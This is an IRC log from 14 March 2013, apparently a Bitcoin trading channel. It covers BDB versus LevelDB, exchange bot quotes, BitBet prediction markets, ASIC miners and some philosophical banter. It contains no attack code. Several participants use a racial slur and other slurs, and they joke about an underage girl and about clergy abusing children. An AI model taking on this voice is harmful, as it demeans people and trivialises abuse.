07:20:23 i think the system is multistable Mar 14 07:20:37 mp wants to drive it to one place Mar 14 07:21:01 devs don't have a vision Mar 14 07:22:52 quest for vision is a great blessing. Mar 14 07:23:18 i want to drive what where ?! Mar 14 07:24:17 benkay: lol plebnet Mar 14 07:36:17 [BTCTC] [S.DICE-PT] 150 @ 0.005 = 0.75 BTC [-] Mar 14 07:36:47 [BTCTC] [ASICMINER-PT] 1 @ 0.76 BTC [+] Mar 14 07:50:45 http://i45.tinypic.com/21m5ky9.png Mar 14 07:50:48 are they so desperate? Mar 14 07:52:00 Wow, kakobrekla; I thought I was planning something stupid... Mar 14 07:53:41 Today in a moment of weakness I was tempted to register on the WOT and start cloning the late Intrade so I could supply idiots with the Bucketshop that they need Mar 14 07:53:59 what stopped you? Mar 14 07:54:30 Whiskey Redbulls Mar 14 07:54:43 also trip to the East Side Mar 14 07:54:57 hmm Mar 14 07:56:11 I like brown sugar occasionaly. Mar 14 07:56:54 I'm just trying to figure out how little reserves a "prediction market" needs to really operate... Mar 14 07:57:26 [MPEX] [O.BTCUSD.P410T] 600 @ 0.05662037 = 33.9722 BTC [-] Mar 14 07:57:45 maybe mircea_popescu can enlighten you Mar 14 07:58:02 Maybe Mar 14 07:58:13 I've read his critique of Intrade Mar 14 07:58:55 Maybe I'm reading wrong which wouldn't be the first time, but it seems like a fair way to separate idiots from their coin. Mar 14 07:58:56 lol weaksauce bfl. Mar 14 07:59:06 BingoBongo if you hedge you won't need much. Mar 14 07:59:12 if you don't hedge you'll go bankrupt. Mar 14 08:00:13 [BTCTC] [S.DICE-PT] 1408 @ 0.005 = 7.04 BTC [-] Mar 14 08:02:39 mircea_popescu I've done bankrupt in the legal liquidation sense before. Surprisingly pleasant. Mar 14 08:03:42 If your trustee thinks you drink like a certain FPGA shilling Tom they just assume you'll end up in the Salvation Army shelter anyway Mar 14 08:04:38 maybe you shouldn't operate a prediction market :p Mar 14 08:05:34 Probably... Mar 14 08:06:15 I can only act so well Mar 14 08:08:48 lol Mar 14 08:09:30 I'll stick with practicing on established sites that maintain transparency like this http://bitbet.us/bet/302/bitcoin-standardized-protocol-approved-this-summer/ Mar 14 08:09:56 i wonder how many people noticed that the girl's announcement ( https://bitcointalk.org/index.php?topic=152027.0 ) actually predates the devs' announcement ( https://bitcointalk.org/index.php?topic=152030.0 ) Mar 14 08:10:25 >=1 Mar 14 08:10:27 for all the nuts ranting and raving about how inept she is in that thread... Mar 14 08:13:01 Really they need to kill BDB with fire. There is no other way. Gavin doesn't have a way to maintain BDB compatibility in LevelDB. Mar 14 08:14:06 i don't grok the hate. what's the big deal ? Mar 14 08:14:55 BDB just doesn't play nicely with other databases. Mar 14 08:15:03 There's a lot of quirks. Mar 14 08:15:30 okay... but i mean, it's old and stable, well tested, much deployed Mar 14 08:15:32 An analogy is how there is no good Postgre fork of WordPress Mar 14 08:15:45 leveldb is just this google doohickey Mar 14 08:16:09 it is just a Google doohickey, but it works better and the license is right Mar 14 08:16:15 alrighty. Mar 14 08:16:52 tho i think code conservatism may be more valuable. rather use something muchly used than something faster, if those are the only two data points. Mar 14 08:18:04 The problem isn't faster the problem is scalability. SatoshiDice for all I defended it against, with BDB's locking bahavior killed BDB as a bitcoin dependency Mar 14 08:18:26 ;;tslb Mar 14 08:18:29 Time since last block: 1 minute and 16 seconds Mar 14 08:18:32 ;;bc,stats Mar 14 08:18:35 Current Blocks: 225769 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 22 blocks | Next Difficulty In About: 3 hours, 20 minutes, and 30 seconds | Next Difficulty Estimate: 4829378.08809 | Estimated Percent Change: 10.56582 Mar 14 08:18:39 ;;asks 1000 Mar 14 08:18:50 There are currently 95281.952 bitcoins offered at or under 1000.0 USD, worth 10346802.3062 USD in total. | Data vintage: 707.1424 seconds Mar 14 08:19:09 ;;ticker Mar 14 08:19:19 Error: Failure to retrieve ticker. Try again later. Mar 14 08:19:25 possibly so. Mar 14 08:19:26 ;; asks 5 Mar 14 08:19:34 i confess to having little clue. Mar 14 08:19:37 There are currently 0 bitcoins offered at or under 5.0 USD, worth 0.0 USD in total. | Data vintage: 753.6468 seconds Mar 14 08:19:42 ;;asks 50 Mar 14 08:19:52 There are currently 28952.846 bitcoins offered at or under 50.0 USD, worth 1417409.54359 USD in total. | Data vintage: 769.2750 seconds Mar 14 08:19:58 ;;bids 5 Mar 14 08:20:09 There are currently 264838.33 bitcoins demanded at or over 5.0 USD, worth 6269951.46228 USD in total. | Data vintage: 785.5630 seconds Mar 14 08:22:15 A market order to sell 350000 bitcoins right now would net 6509777.9570 USD and would take the last price down to 1.2000 USD, resulting in an average price of 18.5994 USD/BTC. | Data vintage: 912.4385 seconds Mar 14 08:22:47 ;;goxlag Mar 14 08:22:53 Error: invalid syntax (, line 1) Mar 14 08:22:56 tyvm Mar 14 08:24:01 ;;goxlag Mar 14 08:24:03 ;;market sell 350000 Mar 14 08:24:07 Error: invalid syntax (, line 1) Mar 14 08:24:14 A market order to sell 350000 bitcoins right now would net 6509777.9570 USD and would take the last price down to 1.2000 USD, resulting in an average price of 18.5994 USD/BTC. | Data vintage: 1030.6224 seconds Mar 14 08:24:21 trading engine is down Mar 14 08:24:26 or smth Mar 14 08:24:34 mine !? Mar 14 08:24:42 nm Mar 14 08:24:56 coincidentally im just writing a short report aroud that. Mar 14 08:34:01 ;;goxlag Mar 14 08:37:39 oh gribble went Mar 14 08:37:50 and im like wtf im ignored? Mar 14 08:38:05 ;;goxlag Mar 14 08:38:24 0.219788 seconds Mar 14 08:39:21 lol Mar 14 08:49:35 [BTCTC] [ASICMINER-PT] 1 @ 0.765 BTC [+] Mar 14 08:52:31 http://trilema.com/2013/the-many-ways-available-for-talking-to-mpex/ Mar 14 08:52:40 the latest word in "being an asshole" Mar 14 08:57:23 http://www.independent.co.uk/incoming/beppe-grillo-northern-europe-waiting-to-drop-italy-like-a-hot-potato-8533213.html Mar 14 08:57:28 future italian president ? Mar 14 08:57:53 uhh? Mar 14 08:57:58 do i need to short eurusd? Mar 14 08:58:03 totally. Mar 14 08:58:06 both ways. Mar 14 08:58:19 :) Mar 14 08:58:44 what was wrong with that italian president that has cex with a hooker? Mar 14 08:58:54 win? Mar 14 08:58:56 that she was underage and stupid Mar 14 08:59:02 and he was over 70 and kinda sleazy Mar 14 08:59:16 17 at the time? Mar 14 08:59:30 ya well, if you factor her mental age into this equation... Mar 14 08:59:30 ruby Mar 14 08:59:42 heh what a psycho Mar 14 08:59:50 i liked how he rigged the recent election Mar 14 08:59:53 noone says shit Mar 14 08:59:54 heh Mar 14 09:07:12 Hey, the Lira is still cheaper than quilted Northern Mar 14 09:07:21 wb BitHub :P Mar 14 09:08:02 yeah been back for an hour, caught up in cleaning, trolling, hows the testing going? Mar 14 09:08:09 busted me Mar 14 09:08:12 hehe Mar 14 09:08:18 other channel. :) Mar 14 09:10:31 [BTCTC] [ASICMINER-PT] 1 @ 0.765 BTC [+] Mar 14 09:38:56 [MPEX] [O.BTCUSD.P390T] 750 @ 0.0419584 = 31.4688 BTC [-] Mar 14 09:40:16 http://edition.cnn.com/2013/03/12/business/facebook-secrets/index.html Mar 14 09:40:25 Less than 5 per cent of users predicted to be gay, for example, were connected with explicitly gay groups. Mar 14 09:40:34 there is nowai to hide it now! Mar 14 09:43:56 lol Mar 14 09:44:53 http://www.scienceworldreport.com/articles/5492/20130311/third-closest-neighbouring-star-system-found-6-lightyears-away.htm Mar 14 09:44:56 check out this guy! Mar 14 09:45:05 scans old archives, finds star system Mar 14 09:45:09 true hacker. Mar 14 09:46:46 you better have been luling at me then Mar 14 09:46:55 that was a good one Mar 14 09:48:51 http://www.scienceworldreport.com/articles/5410/20130306/graphene-antennas-reach-terabits-wireless-bandwidth.htm Mar 14 09:48:53 also! Mar 14 09:51:45 Depending on how sloppy BBet wants to get http://www.gmanetwork.com/news/story/299176/scitech/science/cern-scientists-say-particle-is-no-super-higgs could resolve http://bitbet.us/bet/8/higgs-boson-support/ for certain definitions of both resolved and sloppy Mar 14 09:53:07 For a Dupe because the first link was crap http://news.yahoo.com/cern-scientists-particle-no-super-higgs-212306008.html Mar 14 09:53:42 lol at the first of spring Mar 14 09:54:00 Sure Mar 14 09:56:06 It all depends on BBet's definition of publication and the amount of juices BBet has running down there desiring a won house bet. Mar 14 09:57:18 house bets both ends tho Mar 14 09:57:44 but anyway, the bet reads that support will be published. nonsuport being published isn't related is it. Mar 14 09:57:48 Ah, so the house proposed that one... Mar 14 09:57:54 BingoBongo no ? Mar 14 09:58:05 Ah Mar 14 09:59:14 o hey check it out, twitter Mar 14 10:00:41 Cool Mar 14 10:01:08 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Mar 14 10:01:40 Just think the first graphene took some scotch tape and a #2 pencil Mar 14 10:02:04 [MPEX] [O.BTCUSD.P410T] 200 @ 0.05561259 = 11.1225 BTC [-] Mar 14 10:02:57 http://bitbet.us/bet/269/avalon-will-del/ Mar 14 10:03:04 by now it's like 8:1 for Mar 14 10:05:32 Isn't Avalon still struggling to get a fraction of the first batch out/ Mar 14 10:06:17 It seems units shipped rather than units blown up is still going to be the deciding factor at the wire Mar 14 10:06:34 hey kakobrekla some way to link to comments specifically ? Mar 14 10:06:38 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ << that last one lol Mar 14 10:06:53 BingoBongo whodda thunk that right ? Mar 14 10:06:56 click on the username Mar 14 10:07:00 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/#c351 Mar 14 10:07:46 wtf!!! Mar 14 10:07:54 why didnt the "before march" bet get any bets :( Mar 14 10:07:55 a ty! Mar 14 10:07:58 well, it did get like 20 btc Mar 14 10:08:00 lol, BFL through recklessness might make it this time though Mar 14 10:08:05 Anduck you kidding ? was like 2k Mar 14 10:08:10 i mean Mar 14 10:08:13 the before march 15th Mar 14 10:08:16 o Mar 14 10:08:24 dunno Mar 14 10:08:24 too easy Mar 14 10:08:30 prolly too close ya Mar 14 10:08:31 http://bitbet.us/bet/261/bfl-will-deliver-asic-devices-before-march-15th/ Mar 14 10:08:32 this Mar 14 10:08:34 yep Mar 14 10:08:42 looks like btc-e is down Mar 14 10:08:48 they annouced 9th Mar 14 10:08:56 so 15th was clear win Mar 14 10:09:14 March 15th was too imaginably close. The 31st though is an inconceivable neverland of miracles. Mar 14 10:09:16 whoa they eleced a jesuit as pope ?! Mar 14 10:09:21 this is the end of the world. Mar 14 10:09:25 Yes they did Mar 14 10:09:30 BingoBongo well put. Mar 14 10:09:52 They elected a Jesuit, so they boy touching is never going away Mar 14 10:10:04 'Fruitful mission' Mar 14 10:10:07 soo close the 15th march bet alrdy? =D Mar 14 10:10:12 we'll ahve the first impregnated altar boy ? Mar 14 10:10:16 "Resolution: in 15 hours 51 minutes (15-03-2013)" Mar 14 10:11:22 Maybe?... Mar 14 10:11:35 If this channel wan't logged Mar 14 10:14:40 I think BFL might ship something, but probably miss the target Mar 14 10:14:47 fans Mar 14 10:14:48 What they ship I don't know Mar 14 10:14:51 box of Mar 14 10:15:00 meanwhile.. btc-e is down Mar 14 10:15:08 btc-e is crap Mar 14 10:15:56 If it isn't NVC and trades on Btc-e it trades on Vircurex with greater market making opportunities Mar 14 10:19:33 BTC-E has more volume than Vircurex, but but Vircurex has so many opportunities to trap idiots by using thin Bid/Ask walls. If bitcoin is play money what are these altcoins... Mar 14 10:21:18 *hanbot* gmorning Mar 14 10:28:57 [BTCTC] [GSDPT] 520 @ 0.005 = 2.6 BTC [-] Mar 14 10:39:19 smickles : if you want some easy btc http://www.rugatu.com/questions/11218/there-is-exactly-one-article-on-trilema-featuring-the-picture-of-a-cat-find-it Mar 14 10:45:27 Already first hit on Google for "trilema blog cat" Mar 14 10:47:23 haha nice Mar 14 10:47:52 http://trilema.com/2013/bitbet-february-2013-statement/ Mar 14 10:48:01 ? Mar 14 10:49:33 awww! Mar 14 10:50:21 or that counts as a dragon? :) Mar 14 10:50:29 yeah. Mar 14 10:50:32 cause there's another one :D Mar 14 10:50:45 well scam. Mar 14 10:52:59 [HAVELOCK] [SDICE] 3 @ 0.55 = 1.65 BTC [-] Mar 14 10:53:24 lol Mar 14 10:53:58 [HAVELOCK] [SDICE] 1 @ 0.54900001 BTC [-] Mar 14 10:54:58 [HAVELOCK] [SDICE] 25 @ 0.549 = 13.725 BTC [-] Mar 14 11:02:35 kakobrekla http://www.rugatu.com/questions/11221/there-is-exactly-another-one-article-on-trilema-featuring-the-picture-of-a-cat-find-that-one-too Mar 14 11:02:38 in yo face foo! Mar 14 11:03:24 the 'cat' a euphemism for the female body part? Mar 14 11:03:31 hm? Mar 14 11:03:34 if so there is probably more than one post Mar 14 11:03:37 you deleted the answer or what Mar 14 11:03:44 i couldnt find the button Mar 14 11:03:45 er is 'cat'* Mar 14 11:03:52 dunno Mar 14 11:04:30 grubles nope Mar 14 11:04:40 kakobrekla its a diff q Mar 14 11:04:52 ah Mar 14 11:04:53 right Mar 14 11:04:57 i see. Mar 14 11:05:00 mircea_popescu: lies Mar 14 11:05:03 and yes there's approximately speaking between 5490680 and 59804586 cunts on tyrilema Mar 14 11:05:21 hehe Mar 14 11:05:21 and also i'm having clam chowder soon Mar 14 11:05:40 mircea_popescu: the red or the white? Mar 14 11:05:47 white Mar 14 11:06:27 do...do you get that reference or are you the only romanian that has watched ace ventura Mar 14 11:06:31 cause of the pope? Mar 14 11:07:30 im takin' that one to my grave. Mar 14 11:07:42 nooooooooooooooo!!!one Mar 14 11:08:08 kakobrakla your bounty on Rugatu is redeemable now Mar 14 11:08:31 my balance is 0 Mar 14 11:09:01 scam Mar 14 11:09:07 yep Mar 14 11:10:12 for real wtf Mar 14 11:10:32 shoudlnt this be instant? Mar 14 11:11:25 Ah, needs to move from pending to approved. SHould be available in 2 hours, probably... Mar 14 11:11:33 It should be... Mar 14 11:11:38 Instant... Mar 14 11:11:42 O_o Mar 14 11:11:49 i feel like your nick should be bingoboingo Mar 14 11:11:51 kakobrekla is getting ideas for bitbet Mar 14 11:12:10 He should be... Mar 14 11:12:19 i am? Mar 14 11:12:24 Srsly... Mar 14 11:12:59 yes, how to make it more like suck Mar 14 11:13:08 in other news, http://polimedia.us/dtng/c/src/136325237356.gif Mar 14 11:14:02 dat slap Mar 14 11:16:27 is not bad. Mar 14 11:30:19 [BTCTC] [ASICMINER-PT] 1 @ 0.769998 BTC [+] Mar 14 11:32:44 Does this count for the second scavenger hunt http://trilema.com/2010/retete-de-criza-astazi-pisica/ Mar 14 11:35:27 id say you hit the motherload. Mar 14 11:35:44 imma gonna have to translate it Mar 14 11:37:05 [BTCTC] [BTC-BOND] 100 @ 0.00999 = 0.999 BTC [+] Mar 14 11:39:11 Send me around the world on bitcoins only so I can document it and make a movie Mar 14 11:39:58 wh1t3r4bb1t where are you starting from? Mar 14 11:40:11 Antarctica Mar 14 11:41:07 I'm afraid your best bet is to spin around in a circle... I'm afarid the price to drag my Saturn down there is a bit too steep... Mar 14 11:41:20 I will zig zag around the world proving that you do not need anything but bitcoin to survive. Mar 14 11:41:55 No saturn Mar 14 11:42:13 Only boats trains and planes Mar 14 11:42:20 no cars Mar 14 11:42:23 or trucks Mar 14 11:42:45 maybe a bicycle here and there Mar 14 11:43:30 selling asicminer @ 0.78 Mar 14 11:45:27 wh1t3r4bb1t It seems you underestimate the ability my plastic Saturn L-series sedan has shown to swim in the past... Mar 14 11:59:03 BingoBongo nah, actually that's rabbit Mar 14 11:59:12 (3rd commenter even identifies it correctly) Mar 14 12:01:04 hmm Mar 14 12:01:08 it translates cat Mar 14 12:01:10 i think Mar 14 12:01:18 strange. Mar 14 12:01:21 yes, the point of the article is "here's how you cook cat" Mar 14 12:01:25 but it's really rabbit. Mar 14 12:01:32 a Mar 14 12:01:53 pisica = cat ; iepure = rabbit Mar 14 12:02:03 rabbit meat is kinda borring to me Mar 14 12:02:11 but its healthy or smth Mar 14 12:02:38 just low fat. Mar 14 12:03:02 horse ftw. Mar 14 12:03:24 indeed Mar 14 12:03:45 all these doods with the kobe bs never had decent mare. Mar 14 12:04:40 :) Mar 14 12:14:28 [BTCTC] [ASICMINER-PT] 10 @ 0.769998 = 7.7 BTC [+] Mar 14 12:25:19 hot with dat gpu rig running Mar 14 12:43:01 [BTCTC] [ASICMINER-PT] 1 @ 0.7351 BTC [-] Mar 14 12:43:03 [BTCTC] [ASICMINER-PT] 8 @ 0.735 = 5.88 BTC [-] Mar 14 13:01:22 [MPEX] [O.BTCUSD.P430T] 750 @ 0.07093982 = 53.2049 BTC [-] **** BEGIN LOGGING AT Thu Mar 14 19:05:32 2013 Mar 14 19:05:57 ThickAsThieves: just me misinterpreting regular price fluctuation in btc Mar 14 19:06:37 [BTCTC] [S.DICE-PT] 300 @ 0.0054 = 1.62 BTC [+] Mar 14 19:08:50 [BTCTC] [ASICMINER-PT] 5 @ 0.769998 = 3.85 BTC [+] Mar 14 19:08:53 [BTCTC] [ASICMINER-PT] 4 @ 0.769999 = 3.08 BTC [+] Mar 14 19:09:38 ;;later tell bingobongo hey, SalvorHardin and Philip both win. mark the first guy as winner and tell the other to get in touch here. Mar 14 19:09:40 The operation succeeded. Mar 14 19:10:15 and omg wtf apparently trilema is fulla cats. Mar 14 19:10:18 i had no idea. Mar 14 19:13:03 [BTCTC] [GSDPT] 10 @ 0.005199 = 0.052 BTC [+] Mar 14 19:24:48 so in the end is bitfunder streaming quotes or not rly ? Mar 14 19:26:37 mircea_popescu: the internet is full of cats Mar 14 19:26:48 and trilema is a subset of the internet Mar 14 19:26:52 logic Mar 14 19:27:22 ya but girls are full of cooties, guys are a subset of hm Mar 14 19:27:29 BF is doing websockets Mar 14 19:27:32 i know there's something wrong with your logic but unsure what exactly Mar 14 19:27:39 so someone just has to grab them Mar 14 19:27:48 mircea_popescu: it's an informal fallacy Mar 14 19:27:56 also cooties Mar 14 19:27:56 general -> specific Mar 14 19:29:33 [BTCTC] [BTC-BOND] 200 @ 0.00999 = 1.998 BTC [+] Mar 14 19:53:05 mircea_popescu: i'm testing my sales system now, since i've decided to release what I have now as a 'beta' at half price. Mar 14 19:53:13 re: the gui app Mar 14 19:53:16 o hey Mar 14 19:53:25 (also, you might consider making use of the ref system) Mar 14 19:53:41 I haven't put thought into how that would work yet Mar 14 19:53:47 but i do like the idea Mar 14 19:54:09 ;;tslb Mar 14 19:54:11 Time since last block: 12 minutes and 5 seconds Mar 14 20:05:36 [BTCTC] [ASICMINER-PT] 1 @ 0.737 BTC [-] Mar 14 20:05:38 [BTCTC] [ASICMINER-PT] 1 @ 0.736 BTC [-] Mar 14 20:05:40 [BTCTC] [ASICMINER-PT] 1 @ 0.735 BTC [-] Mar 14 20:06:19 mircea_popescu its not (yet?). Mar 14 20:06:41 ah k Mar 14 20:06:52 i thought it was coming together yest. my bad. Mar 14 20:07:52 i did go about half way yea Mar 14 20:08:07 nature is amazing. Mar 14 20:10:21 !amaze nature Mar 14 20:18:21 [BTCTC] [ESECURITYSABTC] 3 @ 0.4 = 1.2 BTC [-] Mar 14 20:18:22 [BTCTC] [ESECURITYSABTC] 1 @ 0.39839 BTC [-] Mar 14 20:23:35 so, the first thing that any serious crypto currency needs/makes https://bitcointalk.org/index.php?topic=153106.msg1624962;topicseen#msg1624962 Mar 14 20:24:34 ;;bc,diff Mar 14 20:24:36 4847647.1520656 Mar 14 20:24:39 "gettin high on your CPU power" Mar 14 20:25:04 ah sry Mar 14 20:25:10 litecoin is now mined with gpus Mar 14 20:29:49 today's installment of "evil" mp : http://trilema.com/2013/of-men-and-mice/ Mar 14 20:34:25 ;;bc,estimate Mar 14 20:34:27 6068019.81599933 Mar 14 20:36:45 jebus Mar 14 20:36:53 ;;bc,nethash Mar 14 20:36:54 35978.971550544906 Mar 14 20:38:25 the unknowns. Mar 14 20:38:28 asicminer is taking over Mar 14 20:38:47 watch luke & idiotco learn chinese to better explain why everyone should care about their pasty-ass preconceptions. Mar 14 20:39:02 [BTCTC] [COGNITIVE] 1 @ 0.182 BTC [-] Mar 14 20:39:03 [BTCTC] [COGNITIVE] 1 @ 0.16 BTC [-] Mar 14 20:39:05 [BTCTC] [COGNITIVE] 10 @ 0.16 = 1.6 BTC [-] Mar 14 20:39:07 [BTCTC] [COGNITIVE] 1 @ 0.152 BTC [-] Mar 14 20:39:09 [BTCTC] [COGNITIVE] 9 @ 0.1502 = 1.3518 BTC [-] Mar 14 20:41:27 well apaprently lluke has 5th of asic on his pool Mar 14 20:41:42 and that better not be asicminer Mar 14 20:41:57 jesus Mar 14 20:41:58 http://www.rugatu.com/questions/11266/php-array-to-string-conversion?page=1&focusedAnswerId=11270#11270 Mar 14 20:42:02 these coders. Mar 14 20:42:06 lolz Mar 14 20:42:22 ASICMINER will need to get a better chip out soon after these first batches tho Mar 14 20:42:46 pretty sure that was the plan Mar 14 20:43:08 actually i got confused, i meant avalon. Mar 14 20:43:11 shrinking the process is not as hard as starting over Mar 14 20:43:50 yeah Mar 14 20:46:36 mp your article is kinda depressing. i think you might underestimate how many people feel like they are the only ones that see The Right Way, and separately that you could just as easily not be Right at all (life is tricky that way). You seem to care (be bothered by) so much about people that you feel are worth so little. Mar 14 20:56:01 ha! Mar 14 20:56:20 so how do you distinguish ? Mar 14 20:56:56 who is Right, you mean? Mar 14 20:57:04 only oneself I guess Mar 14 20:57:07 a not at all. Mar 14 20:57:19 how do you distinguish between the case where you're right and the case where you're wrong Mar 14 20:57:28 obviously this isn't a vestable attribute, like "being tall" Mar 14 20:57:31 it's a case by case thing Mar 14 20:57:45 or a nonexistent thing Mar 14 20:58:02 well, if you're going the route of relativism might as well forget about action at all Mar 14 20:58:09 and focus on the senses. Mar 14 20:58:20 hedonism ftw. Mar 14 20:58:43 i think human nature includes wanting everyone to be more like what you want Mar 14 20:59:00 some people handle that by just copying others to be more like the group Mar 14 20:59:11 some try to influence others Mar 14 20:59:15 to be more like them Mar 14 20:59:25 but you are aware that life selects, right ? Mar 14 20:59:36 evolution forces species to be more like "right", for a natural definition of that term. Mar 14 20:59:56 i'm gonna be careful cuz i'm, not quite the level of philospher/anthropologist you are Mar 14 21:00:04 me either. Mar 14 21:00:08 hehe Mar 14 21:00:36 but ultimately what's right, it seems, is that which keeps us most adaptable as a species Mar 14 21:00:56 that's one theory. Mar 14 21:01:11 possibly comes from an expiring stage of our species Mar 14 21:01:12 understand, i'm not saying there's anything wrong with the "what keeps me out of pain is right" approach in general. Mar 14 21:01:26 im just saying it's woefully inadequate in anything to do with money, or more generally value Mar 14 21:01:48 money is the currency of life/time Mar 14 21:01:57 yeah something like that. Mar 14 21:02:09 i wrote a piece long ago, in romanian, Mar 14 21:02:17 basically my theory is that the sensate world is underpinned by two essences Mar 14 21:02:22 one is language, the other is money. Mar 14 21:02:24 i guess you just seem extra soapboxy lately Mar 14 21:02:40 and if i were a psychiatrist i'm sure i'd be able to figure out why Mar 14 21:02:47 haha so find one Mar 14 21:03:07 one theory i have is intelligence is a burden Mar 14 21:03:19 heh. do you live in the us ? Mar 14 21:03:23 yes Mar 14 21:03:30 you know... we've seen this before. Mar 14 21:03:31 all of it. Mar 14 21:03:39 well... you wouldn't know cause you don't read russian, but it's not new. Mar 14 21:03:55 i'm no Einstein, but I al constantly disappointed in people Mar 14 21:03:59 al=am Mar 14 21:04:00 1970s, the soviets were going "great", thinking people were starting to suspect intelligence is a burden. Mar 14 21:04:12 and i had to kind of find a zen place to balance it all Mar 14 21:05:01 me too, ThickAsThieves Mar 14 21:05:08 i, like most of here us probly, seek out control of our environment Mar 14 21:05:17 since we cant change people Mar 14 21:05:24 we just dont associate with them Mar 14 21:05:28 irl at least Mar 14 21:05:37 https://bitcointalk.org/index.php?topic=99497.msg1624754#msg1624754 Mar 14 21:05:50 tried that route, it's a hard road Mar 14 21:05:57 I know mrb isnt an idiot, so can someone explain to me why AMs costs go up if BTC/USD does? Mar 14 21:06:29 if costs go up, costs go up Mar 14 21:06:32 :) Mar 14 21:06:34 dub i don't see why it would be related. Mar 14 21:07:36 mircea_popescu: http://mpex.co/mpex-mktdepth.php looks stale Mar 14 21:08:00 ah nm, I think he's arguing against someone who thought the increasing BTC/USD was a good reason to buy AM at these prices Mar 14 21:08:09 as certain diligent coinbr user spotted Mar 14 21:08:12 jurov any particular spot ? Mar 14 21:08:43 S.DICE has much different order book data than on asset page Mar 14 21:09:24 looking. Mar 14 21:09:56 mp, is there anywhere i can read about this russian intellgence as a burden stuff? Mar 14 21:12:43 http://www.smithsonianmag.com/history-archaeology/For-40-Years-This-Russian-Family-Was-Cut-Off-From-Human-Contact-Unaware-of-World-War-II-188843001.html Mar 14 21:12:46 http://www.theregister.co.uk/2013/03/14/us_malware_catalogue_hacked/ The US government's online catalog of cyber-vulnerabilities has been taken offline – ironically, due to a software vulnerability. Mar 14 21:12:53 Clearly they didn't like atheism. Mar 14 21:12:57 so that's a pointer Mar 14 21:12:58 i saw that one dw Mar 14 21:13:02 jurov i just went through s.dice, failed to see a difference ? Mar 14 21:13:06 interesting read it was Mar 14 21:13:15 the jsons are not sorted, could that give the impression the book is different ? Mar 14 21:14:27 no doubt. imagine that -- running for your lives into siberia. Mar 14 21:15:59 jurov oh i see the problem. the cache's sick. Mar 14 21:16:22 deadweasel: eeeevillldooooeeerssss Mar 14 21:16:43 dammit! Mar 14 21:17:00 all of the sudden there is an issue with the underlying toolkit i'm using Mar 14 21:17:05 D: Mar 14 21:17:27 fuckles Mar 14 21:24:22 lol Mar 14 21:24:25 jurov check now! Mar 14 21:25:14 ThickAsThieves i'm not sure there's a better source of all soviet woes in englush than stoljenitsn Mar 14 21:25:26 or however his name is written in english Mar 14 21:26:01 Solzhenitsyn heh Mar 14 21:30:35 mircea yes now it's fresh :) Mar 14 21:31:10 say ty to dilligent user for me :) Mar 14 21:32:15 and for the record, i'm adding safeties to not have stale cache again. this one managed to get away! Mar 14 21:33:35 /home/dxaccess-qa/dxaccess/bin/start-results-migration.sh Mar 14 21:33:45 crap, this is not a terminal Mar 14 21:34:11 o.o Mar 14 21:34:52 deadweasel : simple rule. have all terminals white on black. have all non-terminals black on white. problem solved. Mar 14 21:39:00 yeah, simple rules don't fix things for idiots. Mar 14 21:39:06 i'm trying though. Mar 14 21:40:38 lol Mar 14 21:44:34 you will be disappointed with what you find Mar 14 21:46:12 unless you like lab results for horses, then you'll be ecstatic Mar 14 21:48:16 kakobrekla likes horses. Mar 14 21:48:43 yeah but not the riding or the fucking part. Mar 14 21:51:35 the eating out of Mar 14 21:52:34 eating out horses? Mar 14 21:52:35 well, alot of them have abscesses and whatnot. and cancer. and growths. Mar 14 21:53:04 That is kinda sick, but whatever Mar 14 21:53:50 funny now that everyones testing all the meat to see what animal dna is inside Mar 14 21:53:55 yes, the horses are sick. so they go to the vet. the vet takes blood, sends it to our lab, we send the results to our pretty webUI Mar 14 21:53:56 oh look pig and lamb! Mar 14 21:54:17 I was referring to him eating out horses Mar 14 21:54:24 no doubt Mar 14 21:54:32 no diggity Mar 14 21:54:47 i like the way you horse it Mar 14 21:55:15 time to punch out, adios fellas Mar 14 21:58:35 I AM GETTING ANEW PUPPY Mar 14 21:58:41 WH OWANTS TO SEE IT Mar 14 21:59:10 lol now alex jones is talkin on bitcoin Mar 14 21:59:18 haha Mar 14 21:59:26 like listening to a rock. Mar 14 22:03:27 kakobrekla: What brilliant insights does he offer? Mar 14 22:03:43 so far he has the balls the admit he has no clue Mar 14 22:03:57 the = to Mar 14 22:04:04 stay away from it kakobrekla Mar 14 22:04:06 Well, that's something I guess. Mar 14 22:06:11 whi's alex jones ? Mar 14 22:06:30 http://bitbet.us/bet/297/litecoin-surges-to-02-bitcoins-per-litecoin/ Mar 14 22:06:36 how often do you see true 1:1 split ? Mar 14 22:10:17 alex jones is teh face of libertardanism Mar 14 22:11:32 ;;gpg everify freenode:#bitcoin-otc:5b71a25a862c24f0927276f970937619b057231843eb509b905fdcf3 Mar 14 22:11:33 You are now authenticated for user jurov with key 677ABD62D0AEE7D7 Mar 14 22:11:41 a ok Mar 14 22:12:02 Reminder - I'm still processing S.MPOE claims for helpful MPEx users Mar 14 22:12:03 alex jones is an paranoid whacko Mar 14 22:12:18 bilderburg 9/11 inside job loony Mar 14 22:12:23 let's be clear Mar 14 22:12:42 yea like I said libertarian Mar 14 22:13:04 . Mar 14 22:13:20 straps 3 ar15s to his penis before he leaves the house Mar 14 22:13:54 in reality... Mar 14 22:14:02 lives in fear and never leaves the house Mar 14 22:14:32 dub wait, libertard is someone who believes in global warming and shit about how you shouldn't say nigger, right ? Mar 14 22:14:39 ie, a retarded liberal Mar 14 22:14:50 Since you're talking about, Alex Jones thinks Max Kaiser is the creator of Bitcoin Mar 14 22:14:55 dub isn't being descriptive enough Mar 14 22:15:05 dub is down playing this man Mar 14 22:15:30 he has a dedicated following of sheeple willing to do what he says Mar 14 22:16:27 yep, have you got your water filter yet? essential to remove the government drugs that make you docile Mar 14 22:17:28 lol prison planet /infowars Mar 14 22:17:31 ok, great. Mar 14 22:17:40 haha… 1776 will commence again… hilarious! http://www.youtube.com/watch?v=_XZvMwcluEg Mar 14 22:18:01 Alex's interview with Piers Morgan was hilarious - if you're ever bored. Mar 14 22:18:07 something tells me by 2015 we will be all doing some diff chain and mostly we'll be saying "no, this is not bitcoin, no this is not associated with the weirdo bitcoin devs, the weirdo bitcoin talkshow hosts and the weirdo etc" Mar 14 22:19:08 It seemed like he was making a concerted effort to appear as batshit insane as possible...quite strange. Mar 14 22:19:21 TomServo: hilarious is one word for it Mar 14 22:19:44 yeah the batshit is strong in that one Mar 14 22:19:48 embarrassing is another Mar 14 22:23:26 you'd be uptight too wearing a 30kg bar of silver in your ass Mar 14 